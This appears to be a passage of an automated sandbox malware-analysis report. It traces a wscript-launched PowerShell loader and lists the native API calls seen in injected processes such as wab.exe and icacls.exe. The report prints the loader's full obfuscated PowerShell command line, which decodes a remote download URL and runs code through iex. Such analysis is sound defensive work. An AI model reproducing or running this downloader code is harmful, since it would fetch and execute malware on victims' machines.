Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6539 Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta Jump to behavior
Contains functionality to call native functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201635C0 NtCreateMutant,LdrInitializeThunk, 11_2_201635C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162C70 NtFreeVirtualMemory,LdrInitializeThunk, 11_2_20162C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162DF0 NtQuerySystemInformation,LdrInitializeThunk, 11_2_20162DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20163010 NtOpenDirectoryObject, 11_2_20163010
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20163090 NtSetValueKey, 11_2_20163090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20164340 NtSetContextThread, 11_2_20164340
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20164650 NtSuspendThread, 11_2_20164650
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201639B0 NtGetContextThread, 11_2_201639B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162AB0 NtWaitForSingleObject, 11_2_20162AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162AD0 NtReadFile, 11_2_20162AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162AF0 NtWriteFile, 11_2_20162AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162B60 NtClose, 11_2_20162B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162B80 NtQueryInformationFile, 11_2_20162B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162BA0 NtEnumerateValueKey, 11_2_20162BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162BF0 NtAllocateVirtualMemory, 11_2_20162BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162BE0 NtQueryValueKey, 11_2_20162BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162C00 NtQueryInformationProcess, 11_2_20162C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162C60 NtCreateKey, 11_2_20162C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162CA0 NtQueryInformationToken, 11_2_20162CA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162CC0 NtQueryVirtualMemory, 11_2_20162CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162CF0 NtOpenProcess, 11_2_20162CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20163D10 NtOpenProcessToken, 11_2_20163D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162D10 NtMapViewOfSection, 11_2_20162D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162D00 NtSetInformationFile, 11_2_20162D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162D30 NtUnmapViewOfSection, 11_2_20162D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20163D70 NtOpenThread, 11_2_20163D70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162DB0 NtEnumerateKey, 11_2_20162DB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162DD0 NtDelayExecution, 11_2_20162DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162E30 NtWriteVirtualMemory, 11_2_20162E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162E80 NtReadVirtualMemory, 11_2_20162E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162EA0 NtAdjustPrivilegesToken, 11_2_20162EA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162EE0 NtQueueApcThread, 11_2_20162EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162F30 NtCreateSection, 11_2_20162F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162F60 NtCreateProcessEx, 11_2_20162F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162F90 NtProtectVirtualMemory, 11_2_20162F90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162FB0 NtResumeThread, 11_2_20162FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162FA0 NtQuerySection, 11_2_20162FA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162FE0 NtCreateFile, 11_2_20162FE0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F74340 NtSetContextThread,LdrInitializeThunk, 13_2_02F74340
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F73090 NtSetValueKey,LdrInitializeThunk, 13_2_02F73090
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F74650 NtSuspendThread,LdrInitializeThunk, 13_2_02F74650
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F735C0 NtCreateMutant,LdrInitializeThunk, 13_2_02F735C0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72AF0 NtWriteFile,LdrInitializeThunk, 13_2_02F72AF0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72AD0 NtReadFile,LdrInitializeThunk, 13_2_02F72AD0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 13_2_02F72BF0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72BE0 NtQueryValueKey,LdrInitializeThunk, 13_2_02F72BE0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72BA0 NtEnumerateValueKey,LdrInitializeThunk, 13_2_02F72BA0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72B60 NtClose,LdrInitializeThunk, 13_2_02F72B60
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F739B0 NtGetContextThread,LdrInitializeThunk, 13_2_02F739B0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72EE0 NtQueueApcThread,LdrInitializeThunk, 13_2_02F72EE0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72E80 NtReadVirtualMemory,LdrInitializeThunk, 13_2_02F72E80
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72FE0 NtCreateFile,LdrInitializeThunk, 13_2_02F72FE0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72FB0 NtResumeThread,LdrInitializeThunk, 13_2_02F72FB0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72F30 NtCreateSection,LdrInitializeThunk, 13_2_02F72F30
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72CA0 NtQueryInformationToken,LdrInitializeThunk, 13_2_02F72CA0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk, 13_2_02F72C70
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72C60 NtCreateKey,LdrInitializeThunk, 13_2_02F72C60
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk, 13_2_02F72DF0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72DD0 NtDelayExecution,LdrInitializeThunk, 13_2_02F72DD0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72D30 NtUnmapViewOfSection,LdrInitializeThunk, 13_2_02F72D30
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72D10 NtMapViewOfSection,LdrInitializeThunk, 13_2_02F72D10
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F73010 NtOpenDirectoryObject, 13_2_02F73010
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72AB0 NtWaitForSingleObject, 13_2_02F72AB0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72B80 NtQueryInformationFile, 13_2_02F72B80
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72EA0 NtAdjustPrivilegesToken, 13_2_02F72EA0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72E30 NtWriteVirtualMemory, 13_2_02F72E30
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72FA0 NtQuerySection, 13_2_02F72FA0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72F90 NtProtectVirtualMemory, 13_2_02F72F90
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72F60 NtCreateProcessEx, 13_2_02F72F60
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72CF0 NtOpenProcess, 13_2_02F72CF0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72CC0 NtQueryVirtualMemory, 13_2_02F72CC0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72C00 NtQueryInformationProcess, 13_2_02F72C00
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72DB0 NtEnumerateKey, 13_2_02F72DB0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F73D70 NtOpenThread, 13_2_02F73D70
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F73D10 NtOpenProcessToken, 13_2_02F73D10
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72D00 NtSetInformationFile, 13_2_02F72D00
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003B7020 NtCreateFile, 13_2_003B7020
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003B7180 NtReadFile, 13_2_003B7180
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003B7270 NtDeleteFile, 13_2_003B7270
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003B7310 NtClose, 13_2_003B7310
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003B7460 NtAllocateVirtualMemory, 13_2_003B7460
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348BB596 2_2_00007FFD348BB596
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348BC342 2_2_00007FFD348BC342
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348BA54D 2_2_00007FFD348BA54D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348B347D 2_2_00007FFD348B347D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348B3DBD 2_2_00007FFD348B3DBD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348B7AFA 2_2_00007FFD348B7AFA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_043BF258 5_2_043BF258
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_043BFB28 5_2_043BFB28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_043BEF10 5_2_043BEF10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DF0CC 11_2_201DF0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E70E9 11_2_201E70E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EF0E0 11_2_201EF0E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CA118 11_2_201CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20120100 11_2_20120100
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201FB16B 11_2_201FB16B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2016516C 11_2_2016516C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013B1B0 11_2_2013B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F01AA 11_2_201F01AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E81CC 11_2_201E81CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201352A0 11_2_201352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B2C0 11_2_2014B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E132D 11_2_201E132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EA352 11_2_201EA352
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011D34C 11_2_2011D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2017739A 11_2_2017739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013E3F0 11_2_2013E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F03E6 11_2_201F03E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EF43F 11_2_201EF43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E2446 11_2_201E2446
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20121460 11_2_20121460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DE4F6 11_2_201DE4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20130535 11_2_20130535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E7571 11_2_201E7571
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F0591 11_2_201F0591
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CD5B0 11_2_201CD5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E16CC 11_2_201E16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014C6E0 11_2_2014C6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20154750 11_2_20154750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20130770 11_2_20130770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EF7B0 11_2_201EF7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012C7C0 11_2_2012C7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20132840 11_2_20132840
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013A840 11_2_2013A840
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201168B8 11_2_201168B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E8F0 11_2_2015E8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201338E0 11_2_201338E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20139950 11_2_20139950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B950 11_2_2014B950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20146962 11_2_20146962
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201329A0 11_2_201329A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201FA9A6 11_2_201FA9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EFA49 11_2_201EFA49
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E7A46 11_2_201E7A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A3A6C 11_2_201A3A6C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012EA80 11_2_2012EA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CDAAC 11_2_201CDAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20175AA0 11_2_20175AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DDAC6 11_2_201DDAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EAB40 11_2_201EAB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EFB76 11_2_201EFB76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014FB80 11_2_2014FB80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E6BD7 11_2_201E6BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2016DBF9 11_2_2016DBF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20130C00 11_2_20130C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A9C32 11_2_201A9C32
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0CB5 11_2_201D0CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20120CF2 11_2_20120CF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EFCF2 11_2_201EFCF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013AD00 11_2_2013AD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E1D5A 11_2_201E1D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20133D40 11_2_20133D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E7D73 11_2_201E7D73
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20148DBF 11_2_20148DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014FDC0 11_2_2014FDC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012ADE0 11_2_2012ADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EEE26 11_2_201EEE26
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20130E59 11_2_20130E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20142E90 11_2_20142E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201ECE93 11_2_201ECE93
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20139EB0 11_2_20139EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EEEDB 11_2_201EEEDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EFF09 11_2_201EFF09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20150F30 11_2_20150F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A4F40 11_2_201A4F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131F92 11_2_20131F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EFFB1 11_2_201EFFB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20122FC8 11_2_20122FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013CFE0 11_2_2013CFE0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FE12ED 13_2_02FE12ED
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F5B2C0 13_2_02F5B2C0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F452A0 13_2_02F452A0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FE0274 13_2_02FE0274
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_030003E6 13_2_030003E6
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F4E3F0 13_2_02F4E3F0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F8739A 13_2_02F8739A
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFA352 13_2_02FFA352
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F2D34C 13_2_02F2D34C
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF132D 13_2_02FF132D
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF70E9 13_2_02FF70E9
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFF0E0 13_2_02FFF0E0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FEF0CC 13_2_02FEF0CC
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F470C0 13_2_02F470C0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_0300B16B 13_2_0300B16B
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_030001AA 13_2_030001AA
